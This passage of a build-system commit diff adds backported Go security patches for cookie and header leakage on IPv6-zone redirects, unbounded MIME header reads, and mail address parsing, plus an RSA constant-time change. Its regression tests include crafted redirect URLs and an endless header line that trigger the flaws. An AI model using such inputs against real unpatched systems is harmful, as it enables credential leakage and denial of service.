+diff --git a/src/crypto/rsa/rsa.go b/src/crypto/rsa/rsa.go
+index 5a00ed2..29d9d31 100644
+--- a/src/crypto/rsa/rsa.go
++++ b/src/crypto/rsa/rsa.go
+@@ -19,13 +19,17 @@
+ // over the public key primitive, the PrivateKey type implements the
+ // Decrypter and Signer interfaces from the crypto package.
+ //
+-// The RSA operations in this package are not implemented using constant-time algorithms.
++// Operations in this package are implemented using constant-time algorithms,
++// except for [GenerateKey], [PrivateKey.Precompute], and [PrivateKey.Validate].
++// Every other operation only leaks the bit size of the involved values, which
++// all depend on the selected key size.
+ package rsa
+ 
+ import (
+ 	"crypto"
+ 	"crypto/rand"
+ 	"crypto/subtle"
++	"encoding/binary"
+ 	"errors"
+ 	"hash"
+ 	"io"
+@@ -35,7 +39,6 @@ import (
+ 	"crypto/internal/randutil"
+ )
+ 
+-var bigZero = big.NewInt(0)
+ var bigOne = big.NewInt(1)
+ 
+ // A PublicKey represents the public part of an RSA key.
+@@ -47,7 +50,7 @@ type PublicKey struct {
+ // Size returns the modulus size in bytes. Raw signatures and ciphertexts
+ // for or by this public key will have the same size.
+ func (pub *PublicKey) Size() int {
+-	return (pub.N.BitLen() + 7) / 8
++	return (bigBitLen(pub.N) + 7) / 8
+ }
+ 
+ // OAEPOptions is an interface for passing options to OAEP decryption using the
+@@ -351,10 +354,19 @@ func mgf1XOR(out []byte, hash hash.Hash, seed []byte) {
+ // too large for the size of the public key.
+ var ErrMessageTooLong = errors.New("crypto/rsa: message too long for RSA public key size")
+ 
+-func encrypt(c *big.Int, pub *PublicKey, m *big.Int) *big.Int {
+-	e := big.NewInt(int64(pub.E))
+-	c.Exp(m, e, pub.N)
+-	return c
++func encrypt(pub *PublicKey, plaintext []byte) []byte {
++
++	N := modulusFromNat(natFromBig(pub.N))
++	m := natFromBytes(plaintext).expandFor(N)
++
++	e := make([]byte, 8)
++	binary.BigEndian.PutUint64(e, uint64(pub.E))
++	for len(e) > 1 && e[0] == 0 {
++		e = e[1:]
++	}
++
++	out := make([]byte, modulusSize(N))
++	return new(nat).exp(m, e, N).fillBytes(out)
+ }
+ 
+ // EncryptOAEP encrypts the given message with RSA-OAEP.
+@@ -404,12 +416,7 @@ func EncryptOAEP(hash hash.Hash, random io.Reader, pub *PublicKey, msg []byte, l
+ 	mgf1XOR(db, hash, seed)
+ 	mgf1XOR(seed, hash, db)
+ 
+-	m := new(big.Int)
+-	m.SetBytes(em)
+-	c := encrypt(new(big.Int), pub, m)
+-
+-	out := make([]byte, k)
+-	return c.FillBytes(out), nil
++	return encrypt(pub, em), nil
+ }
+ 
+ // ErrDecryption represents a failure to decrypt a message.
+@@ -451,98 +458,71 @@ func (priv *PrivateKey) Precompute() {
+ 	}
+ }
+ 
+-// decrypt performs an RSA decryption, resulting in a plaintext integer. If a
+-// random source is given, RSA blinding is used.
+-func decrypt(random io.Reader, priv *PrivateKey, c *big.Int) (m *big.Int, err error) {
+-	// TODO(agl): can we get away with reusing blinds?
+-	if c.Cmp(priv.N) > 0 {
+-		err = ErrDecryption
+-		return
++// decrypt performs an RSA decryption of ciphertext into out.
++func decrypt(priv *PrivateKey, ciphertext []byte) ([]byte, error) {
++
++	N := modulusFromNat(natFromBig(priv.N))
++	c := natFromBytes(ciphertext).expandFor(N)
++	if c.cmpGeq(N.nat) == 1 {
++		return nil, ErrDecryption
+ 	}
+ 	if priv.N.Sign() == 0 {
+ 		return nil, ErrDecryption
+ 	}
+ 
+-	var ir *big.Int
+-	if random != nil {
+-		randutil.MaybeReadByte(random)
+-
+-		// Blinding enabled. Blinding involves multiplying c by r^e.
+-		// Then the decryption operation performs (m^e * r^e)^d mod n
+-		// which equals mr mod n. The factor of r can then be removed
+-		// by multiplying by the multiplicative inverse of r.
+-
+-		var r *big.Int
+-		ir = new(big.Int)
+-		for {
+-			r, err = rand.Int(random, priv.N)
+-			if err != nil {
+-				return
+-			}
+-			if r.Cmp(bigZero) == 0 {
+-				r = bigOne
+-			}
+-			ok := ir.ModInverse(r, priv.N)
+-			if ok != nil {
+-				break
+-			}
+-		}
+-		bigE := big.NewInt(int64(priv.E))
+-		rpowe := new(big.Int).Exp(r, bigE, priv.N) // N != 0
+-		cCopy := new(big.Int).Set(c)
+-		cCopy.Mul(cCopy, rpowe)
+-		cCopy.Mod(cCopy, priv.N)
+-		c = cCopy
+-	}
+-
++	// Note that because our private decryption exponents are stored as big.Int,
++	// we potentially leak the exact number of bits of these exponents. This
++	// isn't great, but should be fine.
+ 	if priv.Precomputed.Dp == nil {
+-		m = new(big.Int).Exp(c, priv.D, priv.N)
+-	} else {
+-		// We have the precalculated values needed for the CRT.
+-		m = new(big.Int).Exp(c, priv.Precomputed.Dp, priv.Primes[0])
+-		m2 := new(big.Int).Exp(c, priv.Precomputed.Dq, priv.Primes[1])
+-		m.Sub(m, m2)
+-		if m.Sign() < 0 {
+-			m.Add(m, priv.Primes[0])
+-		}
+-		m.Mul(m, priv.Precomputed.Qinv)
+-		m.Mod(m, priv.Primes[0])
+-		m.Mul(m, priv.Primes[1])
+-		m.Add(m, m2)
+-
+-		for i, values := range priv.Precomputed.CRTValues {
+-			prime := priv.Primes[2+i]
+-			m2.Exp(c, values.Exp, prime)
+-			m2.Sub(m2, m)
+-			m2.Mul(m2, values.Coeff)
+-			m2.Mod(m2, prime)
+-			if m2.Sign() < 0 {
+-				m2.Add(m2, prime)
+-			}
+-			m2.Mul(m2, values.R)
+-			m.Add(m, m2)
+-		}
+-	}
+-
+-	if ir != nil {
+-		// Unblind.
+-		m.Mul(m, ir)
+-		m.Mod(m, priv.N)
+-	}
+-
+-	return
++		out := make([]byte, modulusSize(N))
++		return new(nat).exp(c, priv.D.Bytes(), N).fillBytes(out), nil
++	}
++
++	t0 := new(nat)
++	P := modulusFromNat(natFromBig(priv.Primes[0]))
++	Q := modulusFromNat(natFromBig(priv.Primes[1]))
++	// m = c ^ Dp mod p
++	m := new(nat).exp(t0.mod(c, P), priv.Precomputed.Dp.Bytes(), P)
++	// m2 = c ^ Dq mod q
++	m2 := new(nat).exp(t0.mod(c, Q), priv.Precomputed.Dq.Bytes(), Q)
++	// m = m - m2 mod p
++	m.modSub(t0.mod(m2, P), P)
++	// m = m * Qinv mod p
++	m.modMul(natFromBig(priv.Precomputed.Qinv).expandFor(P), P)
++	// m = m * q mod N
++	m.expandFor(N).modMul(t0.mod(Q.nat, N), N)
++	// m = m + m2 mod N
++	m.modAdd(m2.expandFor(N), N)
++
++	for i, values := range priv.Precomputed.CRTValues {
++		p := modulusFromNat(natFromBig(priv.Primes[2+i]))
++		// m2 = c ^ Exp mod p
++		m2.exp(t0.mod(c, p), values.Exp.Bytes(), p)
++		// m2 = m2 - m mod p
++		m2.modSub(t0.mod(m, p), p)
++		// m2 = m2 * Coeff mod p
++		m2.modMul(natFromBig(values.Coeff).expandFor(p), p)
++		// m2 = m2 * R mod N
++		R := natFromBig(values.R).expandFor(N)
++		m2.expandFor(N).modMul(R, N)
++		// m = m + m2 mod N
++		m.modAdd(m2, N)
++	}
++
++	out := make([]byte, modulusSize(N))
++	return m.fillBytes(out), nil
+ }
+ 
+-func decryptAndCheck(random io.Reader, priv *PrivateKey, c *big.Int) (m *big.Int, err error) {
+-	m, err = decrypt(random, priv, c)
++func decryptAndCheck(priv *PrivateKey, ciphertext []byte) (m []byte, err error) {
++	m, err = decrypt(priv, ciphertext)
+ 	if err != nil {
+ 		return nil, err
+ 	}
+ 
+ 	// In order to defend against errors in the CRT computation, m^e is
+ 	// calculated, which should match the original ciphertext.
+-	check := encrypt(new(big.Int), &priv.PublicKey, m)
+-	if c.Cmp(check) != 0 {
++	check := encrypt(&priv.PublicKey, m)
++	if subtle.ConstantTimeCompare(ciphertext, check) != 1 {
+ 		return nil, errors.New("rsa: internal error")
+ 	}
+ 	return m, nil
+@@ -554,9 +534,7 @@ func decryptAndCheck(random io.Reader, priv *PrivateKey, c *big.Int) (m *big.Int
+ // Encryption and decryption of a given message must use the same hash function
+ // and sha256.New() is a reasonable choice.
+ //
+-// The random parameter, if not nil, is used to blind the private-key operation
+-// and avoid timing side-channel attacks. Blinding is purely internal to this
+-// function – the random data need not match that used when encrypting.
++// The random parameter is legacy and ignored, and it can be as nil.
+ //
+ // The label parameter must match the value given when encrypting. See
+ // EncryptOAEP for details.
+@@ -570,9 +548,7 @@ func DecryptOAEP(hash hash.Hash, random io.Reader, priv *PrivateKey, ciphertext
+ 		return nil, ErrDecryption
+ 	}
+ 
+-	c := new(big.Int).SetBytes(ciphertext)
+-
+-	m, err := decrypt(random, priv, c)
++	em, err := decrypt(priv, ciphertext)
+ 	if err != nil {
+ 		return nil, err
+ 	}
+@@ -581,10 +557,6 @@ func DecryptOAEP(hash hash.Hash, random io.Reader, priv *PrivateKey, ciphertext
+ 	lHash := hash.Sum(nil)
+ 	hash.Reset()
+ 
+-	// We probably leak the number of leading zeros.
+-	// It's not clear that we can do anything about this.
+-	em := m.FillBytes(make([]byte, k))
+-
+ 	firstByteIsZero := subtle.ConstantTimeByteEq(em[0], 0)
+ 
+ 	seed := em[1 : hash.Size()+1]
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-45289.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-45289.patch
new file mode 100644
index 0000000000..13d3510504
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-45289.patch
@@ -0,0 +1,121 @@
+From 20586c0dbe03d144f914155f879fa5ee287591a1 Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Thu, 11 Jan 2024 11:31:57 -0800
+Subject: [PATCH] [release-branch.go1.21] net/http, net/http/cookiejar: avoid
+ subdomain matches on IPv6 zones
+
+When deciding whether to forward cookies or sensitive headers
+across a redirect, do not attempt to interpret an IPv6 address
+as a domain name.
+
+Avoids a case where a maliciously-crafted redirect to an
+IPv6 address with a scoped addressing zone could be
+misinterpreted as a within-domain redirect. For example,
+we could interpret "::1%.www.example.com" as a subdomain
+of "www.example.com".
+
+Thanks to Juho Nurminen of Mattermost for reporting this issue.
+
+Fixes CVE-2023-45289
+Fixes #65385
+For #65065
+
+Change-Id: I8f463f59f0e700c8a18733d2b264a8bcb3a19599
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2131938
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2173775
+Reviewed-by: Carlos Amedee <amedee@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/569239
+Reviewed-by: Carlos Amedee <carlos@golang.org>
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+TryBot-Bypass: Michael Knyszek <mknyszek@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/20586c0dbe03d144f914155f879fa5ee287591a1]
+CVE: CVE-2023-45289
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/net/http/client.go             |  6 ++++++
+ src/net/http/client_test.go        |  1 +
+ src/net/http/cookiejar/jar.go      |  7 +++++++
+ src/net/http/cookiejar/jar_test.go | 10 ++++++++++
+ 4 files changed, 24 insertions(+)
+
+diff --git a/src/net/http/client.go b/src/net/http/client.go
+index a496f1c..2031834 100644
+--- a/src/net/http/client.go
++++ b/src/net/http/client.go
+@@ -973,6 +973,12 @@ func isDomainOrSubdomain(sub, parent string) bool {
+ 	if sub == parent {
+ 		return true
+ 	}
++	// If sub contains a :, it's probably an IPv6 address (and is definitely not a hostname).
++	// Don't check the suffix in this case, to avoid matching the contents of a IPv6 zone.
++	// For example, "::1%.www.example.com" is not a subdomain of "www.example.com".
++	if strings.ContainsAny(sub, ":%") {
++		return false
++	}
+ 	// If sub is "foo.example.com" and parent is "example.com",
+ 	// that means sub must end in "."+parent.
+ 	// Do it without allocating.
+diff --git a/src/net/http/client_test.go b/src/net/http/client_test.go
+index 2b4f53f..442fe35 100644
+--- a/src/net/http/client_test.go
++++ b/src/net/http/client_test.go
+@@ -1703,6 +1703,7 @@ func TestShouldCopyHeaderOnRedirect(t *testing.T) {
+ 		{"cookie2", "http://foo.com/", "http://bar.com/", false},
+ 		{"authorization", "http://foo.com/", "http://bar.com/", false},
+ 		{"www-authenticate", "http://foo.com/", "http://bar.com/", false},
++		{"authorization", "http://foo.com/", "http://[::1%25.foo.com]/", false},
+ 
+ 		// But subdomains should work:
+ 		{"www-authenticate", "http://foo.com/", "http://foo.com/", true},
+diff --git a/src/net/http/cookiejar/jar.go b/src/net/http/cookiejar/jar.go
+index 9f19917..18cbfc2 100644
+--- a/src/net/http/cookiejar/jar.go
++++ b/src/net/http/cookiejar/jar.go
+@@ -356,6 +356,13 @@ func jarKey(host string, psl PublicSuffixList) string {
+ 
+ // isIP reports whether host is an IP address.
+ func isIP(host string) bool {
++	if strings.ContainsAny(host, ":%") {
++		// Probable IPv6 address.
++		// Hostnames can't contain : or %, so this is definitely not a valid host.
++		// Treating it as an IP is the more conservative option, and avoids the risk
++		// of interpeting ::1%.www.example.com as a subtomain of www.example.com.
++		return true
++	}
+ 	return net.ParseIP(host) != nil
+ }
+ 
+diff --git a/src/net/http/cookiejar/jar_test.go b/src/net/http/cookiejar/jar_test.go
+index 47fb1ab..fd8d40e 100644
+--- a/src/net/http/cookiejar/jar_test.go
++++ b/src/net/http/cookiejar/jar_test.go
+@@ -251,6 +251,7 @@ var isIPTests = map[string]bool{
+ 	"127.0.0.1":            true,
+ 	"1.2.3.4":              true,
+ 	"2001:4860:0:2001::68": true,
++	"::1%zone":             true,
+ 	"example.com":          false,
+ 	"1.1.1.300":            false,
+ 	"www.foo.bar.net":      false,
+@@ -613,6 +614,15 @@ var basicsTests = [...]jarTest{
+ 			{"http://www.host.test:1234/", "a=1"},
+ 		},
+ 	},
++	{
++		"IPv6 zone is not treated as a host.",
++		"https://example.com/",
++		[]string{"a=1"},
++		"a=1",
++		[]query{
++			{"https://[::1%25.example.com]:80/", ""},
++		},
++	},
+ }
+ 
+ func TestBasics(t *testing.T) {
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-45290.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-45290.patch
new file mode 100644
index 0000000000..ddc2f67c96
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-45290.patch
@@ -0,0 +1,271 @@
+From bf80213b121074f4ad9b449410a4d13bae5e9be0 Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Tue, 16 Jan 2024 15:37:52 -0800
+Subject: [PATCH] [release-branch.go1.21] net/textproto, mime/multipart: avoid
+ unbounded read in MIME header
+
+mime/multipart.Reader.ReadForm allows specifying the maximum amount
+of memory that will be consumed by the form. While this limit is
+correctly applied to the parsed form data structure, it was not
+being applied to individual header lines in a form.
+
+For example, when presented with a form containing a header line
+that never ends, ReadForm will continue to read the line until it
+runs out of memory.
+
+Limit the amount of data consumed when reading a header.
+
+Fixes CVE-2023-45290
+Fixes #65389
+For #65383
+
+Change-Id: I7f9264d25752009e95f6b2c80e3d76aaf321d658
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2134435
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2173776
+Reviewed-by: Carlos Amedee <amedee@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/569240
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+LUCI-TryBot-Result: Go LUCI <golang-scoped@luci-project-accounts.iam.gserviceaccount.com>
+Reviewed-by: Carlos Amedee <carlos@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/bf80213b121074f4ad9b449410a4d13bae5e9be0]
+CVE: CVE-2023-45290
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/mime/multipart/formdata_test.go | 42 +++++++++++++++++++++++++
+ src/net/textproto/reader.go         | 48 ++++++++++++++++++++---------
+ src/net/textproto/reader_test.go    | 12 ++++++++
+ 3 files changed, 87 insertions(+), 15 deletions(-)
+
+diff --git a/src/mime/multipart/formdata_test.go b/src/mime/multipart/formdata_test.go
+index c78eeb7..f729da6 100644
+--- a/src/mime/multipart/formdata_test.go
++++ b/src/mime/multipart/formdata_test.go
+@@ -421,6 +421,48 @@ func TestReadFormLimits(t *testing.T) {
+ 	}
+ }
+ 
++func TestReadFormEndlessHeaderLine(t *testing.T) {
++	for _, test := range []struct {
++		name   string
++		prefix string
++	}{{
++		name:   "name",
++		prefix: "X-",
++	}, {
++		name:   "value",
++		prefix: "X-Header: ",
++	}, {
++		name:   "continuation",
++		prefix: "X-Header: foo\r\n  ",
++	}} {
++		t.Run(test.name, func(t *testing.T) {
++			const eol = "\r\n"
++			s := `--boundary` + eol
++			s += `Content-Disposition: form-data; name="a"` + eol
++			s += `Content-Type: text/plain` + eol
++			s += test.prefix
++			fr := io.MultiReader(
++				strings.NewReader(s),
++				neverendingReader('X'),
++			)
++			r := NewReader(fr, "boundary")
++			_, err := r.ReadForm(1 << 20)
++			if err != ErrMessageTooLarge {
++				t.Fatalf("ReadForm(1 << 20): %v, want ErrMessageTooLarge", err)
++			}
++		})
++	}
++}
++
++type neverendingReader byte
++
++func (r neverendingReader) Read(p []byte) (n int, err error) {
++	for i := range p {
++		p[i] = byte(r)
++	}
++	return len(p), nil
++}
++
+ func BenchmarkReadForm(b *testing.B) {
+ 	for _, test := range []struct {
+ 		name string
+diff --git a/src/net/textproto/reader.go b/src/net/textproto/reader.go
+index ad2d777..cea6613 100644
+--- a/src/net/textproto/reader.go
++++ b/src/net/textproto/reader.go
+@@ -17,6 +17,10 @@ import (
+ 	"sync"
+ )
+ 
++// TODO: This should be a distinguishable error (ErrMessageTooLarge)
++// to allow mime/multipart to detect it.
++var errMessageTooLarge = errors.New("message too large")
++
+ // A Reader implements convenience methods for reading requests
+ // or responses from a text protocol network connection.
+ type Reader struct {
+@@ -38,13 +42,13 @@ func NewReader(r *bufio.Reader) *Reader {
+ // ReadLine reads a single line from r,
+ // eliding the final \n or \r\n from the returned string.
+ func (r *Reader) ReadLine() (string, error) {
+-	line, err := r.readLineSlice()
++	line, err := r.readLineSlice(-1)
+ 	return string(line), err
+ }
+ 
+ // ReadLineBytes is like ReadLine but returns a []byte instead of a string.
+ func (r *Reader) ReadLineBytes() ([]byte, error) {
+-	line, err := r.readLineSlice()
++	line, err := r.readLineSlice(-1)
+ 	if line != nil {
+ 		buf := make([]byte, len(line))
+ 		copy(buf, line)
+@@ -53,7 +57,10 @@ func (r *Reader) ReadLineBytes() ([]byte, error) {
+ 	return line, err
+ }
+ 
+-func (r *Reader) readLineSlice() ([]byte, error) {
++// readLineSlice reads a single line from r,
++// up to lim bytes long (or unlimited if lim is less than 0),
++// eliding the final \r or \r\n from the returned string.
++func (r *Reader) readLineSlice(lim int64) ([]byte, error) {
+ 	r.closeDot()
+ 	var line []byte
+ 	for {
+@@ -61,6 +68,9 @@ func (r *Reader) readLineSlice() ([]byte, error) {
+ 		if err != nil {
+ 			return nil, err
+ 		}
++		if lim >= 0 && int64(len(line))+int64(len(l)) > lim {
++			return nil, errMessageTooLarge
++		}
+ 		// Avoid the copy if the first call produced a full line.
+ 		if line == nil && !more {
+ 			return l, nil
+@@ -93,7 +103,7 @@ func (r *Reader) readLineSlice() ([]byte, error) {
+ // A line consisting of only white space is never continued.
+ //
+ func (r *Reader) ReadContinuedLine() (string, error) {
+-	line, err := r.readContinuedLineSlice(noValidation)
++	line, err := r.readContinuedLineSlice(-1, noValidation)
+ 	return string(line), err
+ }
+ 
+@@ -114,7 +124,7 @@ func trim(s []byte) []byte {
+ // ReadContinuedLineBytes is like ReadContinuedLine but
+ // returns a []byte instead of a string.
+ func (r *Reader) ReadContinuedLineBytes() ([]byte, error) {
+-	line, err := r.readContinuedLineSlice(noValidation)
++	line, err := r.readContinuedLineSlice(-1, noValidation)
+ 	if line != nil {
+ 		buf := make([]byte, len(line))
+ 		copy(buf, line)
+@@ -127,13 +137,14 @@ func (r *Reader) ReadContinuedLineBytes() ([]byte, error) {
+ // returning a byte slice with all lines. The validateFirstLine function
+ // is run on the first read line, and if it returns an error then this
+ // error is returned from readContinuedLineSlice.
+-func (r *Reader) readContinuedLineSlice(validateFirstLine func([]byte) error) ([]byte, error) {
++// It reads up to lim bytes of data (or unlimited if lim is less than 0).
++func (r *Reader) readContinuedLineSlice(lim int64, validateFirstLine func([]byte) error) ([]byte, error) {
+ 	if validateFirstLine == nil {
+ 		return nil, fmt.Errorf("missing validateFirstLine func")
+ 	}
+ 
+ 	// Read the first line.
+-	line, err := r.readLineSlice()
++	line, err := r.readLineSlice(lim)
+ 	if err != nil {
+ 		return nil, err
+ 	}
+@@ -161,13 +172,21 @@ func (r *Reader) readContinuedLineSlice(validateFirstLine func([]byte) error) ([
+ 	// copy the slice into buf.
+ 	r.buf = append(r.buf[:0], trim(line)...)
+ 
++	if lim < 0 {
++		lim = math.MaxInt64
++	}
++	lim -= int64(len(r.buf))
++
+ 	// Read continuation lines.
+ 	for r.skipSpace() > 0 {
+-		line, err := r.readLineSlice()
++		r.buf = append(r.buf, ' ')
++		if int64(len(r.buf)) >= lim {
++			return nil, errMessageTooLarge
++		}
++		line, err := r.readLineSlice(lim - int64(len(r.buf)))
+ 		if err != nil {
+ 			break
+ 		}
+-		r.buf = append(r.buf, ' ')
+ 		r.buf = append(r.buf, trim(line)...)
+ 	}
+ 	return r.buf, nil
+@@ -512,7 +531,8 @@ func readMIMEHeader(r *Reader, maxMemory, maxHeaders int64) (MIMEHeader, error)
+ 
+ 	// The first line cannot start with a leading space.
+ 	if buf, err := r.R.Peek(1); err == nil && (buf[0] == ' ' || buf[0] == '\t') {
+-		line, err := r.readLineSlice()
++		const errorLimit = 80 // arbitrary limit on how much of the line we'll quote
++		line, err := r.readLineSlice(errorLimit)
+ 		if err != nil {
+ 			return m, err
+ 		}
+@@ -520,7 +540,7 @@ func readMIMEHeader(r *Reader, maxMemory, maxHeaders int64) (MIMEHeader, error)
+ 	}
+ 
+ 	for {
+-		kv, err := r.readContinuedLineSlice(mustHaveFieldNameColon)
++		kv, err := r.readContinuedLineSlice(maxMemory, mustHaveFieldNameColon)
+ 		if len(kv) == 0 {
+ 			return m, err
+ 		}
+@@ -541,7 +561,7 @@ func readMIMEHeader(r *Reader, maxMemory, maxHeaders int64) (MIMEHeader, error)
+ 
+ 		maxHeaders--
+ 		if maxHeaders < 0 {
+-			return nil, errors.New("message too large")
++			return nil, errMessageTooLarge
+ 		}
+ 
+ 		// backport 5c55ac9bf1e5f779220294c843526536605f42ab
+@@ -567,9 +587,7 @@ func readMIMEHeader(r *Reader, maxMemory, maxHeaders int64) (MIMEHeader, error)
+ 		}
+ 		maxMemory -= int64(len(value))
+ 		if maxMemory < 0 {
+-			// TODO: This should be a distinguishable error (ErrMessageTooLarge)
+-			// to allow mime/multipart to detect it.
+-			return m, errors.New("message too large")
++			return m, errMessageTooLarge
+ 		}
+ 		if vv == nil && len(strs) > 0 {
+ 			// More than likely this will be a single-element key.
+diff --git a/src/net/textproto/reader_test.go b/src/net/textproto/reader_test.go
+index 3ae0de1..db1ed91 100644
+--- a/src/net/textproto/reader_test.go
++++ b/src/net/textproto/reader_test.go
+@@ -34,6 +34,18 @@ func TestReadLine(t *testing.T) {
+ 	}
+ }
+ 
++func TestReadLineLongLine(t *testing.T) {
++	line := strings.Repeat("12345", 10000)
++	r := reader(line + "\r\n")
++	s, err := r.ReadLine()
++	if err != nil {
++		t.Fatalf("Line 1: %v", err)
++	}
++	if s != line {
++		t.Fatalf("%v-byte line does not match expected %v-byte line", len(s), len(line))
++	}
++}
++
+ func TestReadContinuedLine(t *testing.T) {
+ 	r := reader("line1\nline\n 2\nline3\n")
+ 	s, err := r.ReadContinuedLine()
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2024-24784.patch b/meta/recipes-devtools/go/go-1.14/CVE-2024-24784.patch
new file mode 100644
index 0000000000..e9d9d972b9
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2024-24784.patch
@@ -0,0 +1,205 @@
+From 5330cd225ba54c7dc78c1b46dcdf61a4671a632c Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Wed, 10 Jan 2024 11:02:14 -0800
+Subject: [PATCH] [release-branch.go1.22] net/mail: properly handle special
+ characters in phrase and obs-phrase
+
+Fixes a couple of misalignments with RFC 5322 which introduce
+significant diffs between (mostly) conformant parsers.
+
+This change reverts the changes made in CL50911, which allowed certain
+special RFC 5322 characters to appear unquoted in the "phrase" syntax.
+It is unclear why this change was made in the first place, and created
+a divergence from comformant parsers. In particular this resulted in
+treating comments in display names incorrectly.
+
+Additionally properly handle trailing malformed comments in the group
+syntax.
+
+For #65083
+Fixed #65849
+
+Change-Id: I00dddc044c6ae3381154e43236632604c390f672
+Reviewed-on: https://go-review.googlesource.com/c/go/+/555596
+Reviewed-by: Damien Neil <dneil@google.com>
+LUCI-TryBot-Result: Go LUCI <golang-scoped@luci-project-accounts.iam.gserviceaccount.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/566215
+Reviewed-by: Carlos Amedee <carlos@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/5330cd225ba54c7dc78c1b46dcdf61a4671a632c]
+CVE: CVE-2024-24784
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+ src/net/mail/message.go      | 30 +++++++++++++++------------
+ src/net/mail/message_test.go | 40 ++++++++++++++++++++++++++----------
+ 2 files changed, 46 insertions(+), 24 deletions(-)
+
+diff --git a/src/net/mail/message.go b/src/net/mail/message.go
+index af516fc30f470..fc2a9e46f811b 100644
+--- a/src/net/mail/message.go
++++ b/src/net/mail/message.go
+@@ -280,7 +280,7 @@ func (a *Address) String() string {
+ 	// Add quotes if needed
+ 	quoteLocal := false
+ 	for i, r := range local {
+-		if isAtext(r, false, false) {
++		if isAtext(r, false) {
+ 			continue
+ 		}
+ 		if r == '.' {
+@@ -444,7 +444,7 @@ func (p *addrParser) parseAddress(handleGroup bool) ([]*Address, error) {
+ 	if !p.consume('<') {
+ 		atext := true
+ 		for _, r := range displayName {
+-			if !isAtext(r, true, false) {
++			if !isAtext(r, true) {
+ 				atext = false
+ 				break
+ 			}
+@@ -479,7 +479,9 @@ func (p *addrParser) consumeGroupList() ([]*Address, error) {
+ 	// handle empty group.
+ 	p.skipSpace()
+ 	if p.consume(';') {
+-		p.skipCFWS()
++		if !p.skipCFWS() {
++			return nil, errors.New("mail: misformatted parenthetical comment")
++		}
+ 		return group, nil
+ 	}
+ 
+@@ -496,7 +498,9 @@ func (p *addrParser) consumeGroupList() ([]*Address, error) {
+ 			return nil, errors.New("mail: misformatted parenthetical comment")
+ 		}
+ 		if p.consume(';') {
+-			p.skipCFWS()
++			if !p.skipCFWS() {
++				return nil, errors.New("mail: misformatted parenthetical comment")
++			}
+ 			break
+ 		}
+ 		if !p.consume(',') {
+@@ -566,6 +570,12 @@ func (p *addrParser) consumePhrase() (phrase string, err error) {
+ 	var words []string
+ 	var isPrevEncoded bool
+ 	for {
++		// obs-phrase allows CFWS after one word
++		if len(words) > 0 {
++			if !p.skipCFWS() {
++				return "", errors.New("mail: misformatted parenthetical comment")
++			}
++		}
+ 		// word = atom / quoted-string
+ 		var word string
+ 		p.skipSpace()
+@@ -661,7 +671,6 @@ Loop:
+ // If dot is true, consumeAtom parses an RFC 5322 dot-atom instead.
+ // If permissive is true, consumeAtom will not fail on:
+ // - leading/trailing/double dots in the atom (see golang.org/issue/4938)
+-// - special characters (RFC 5322 3.2.3) except '<', '>', ':' and '"' (see golang.org/issue/21018)
+ func (p *addrParser) consumeAtom(dot bool, permissive bool) (atom string, err error) {
+ 	i := 0
+ 
+@@ -672,7 +681,7 @@ Loop:
+ 		case size == 1 && r == utf8.RuneError:
+ 			return "", fmt.Errorf("mail: invalid utf-8 in address: %q", p.s)
+ 
+-		case size == 0 || !isAtext(r, dot, permissive):
++		case size == 0 || !isAtext(r, dot):
+ 			break Loop
+ 
+ 		default:
+@@ -850,18 +859,13 @@ func (e charsetError) Error() string {
+ 
+ // isAtext reports whether r is an RFC 5322 atext character.
+ // If dot is true, period is included.
+-// If permissive is true, RFC 5322 3.2.3 specials is included,
+-// except '<', '>', ':' and '"'.
+-func isAtext(r rune, dot, permissive bool) bool {
++func isAtext(r rune, dot bool) bool {
+ 	switch r {
+ 	case '.':
+ 		return dot
+ 
+ 	// RFC 5322 3.2.3. specials
+-	case '(', ')', '[', ']', ';', '@', '\\', ',':
+-		return permissive
+-
+-	case '<', '>', '"', ':':
++	case '(', ')', '<', '>', '[', ']', ':', ';', '@', '\\', ',', '"': // RFC 5322 3.2.3. specials
+ 		return false
+ 	}
+ 	return isVchar(r)
+diff --git a/src/net/mail/message_test.go b/src/net/mail/message_test.go
+index 1e1bb4092f659..1f2f62afbf406 100644
+--- a/src/net/mail/message_test.go
++++ b/src/net/mail/message_test.go
+@@ -385,8 +385,11 @@ func TestAddressParsingError(t *testing.T) {
+ 		13: {"group not closed: null@example.com", "expected comma"},
+ 		14: {"group: first@example.com, second@example.com;", "group with multiple addresses"},
+ 		15: {"john.doe", "missing '@' or angle-addr"},
+-		16: {"john.doe@", "no angle-addr"},
++		16: {"john.doe@", "missing '@' or angle-addr"},
+ 		17: {"John Doe@foo.bar", "no angle-addr"},
++		18: {" group: null@example.com; (asd", "misformatted parenthetical comment"},
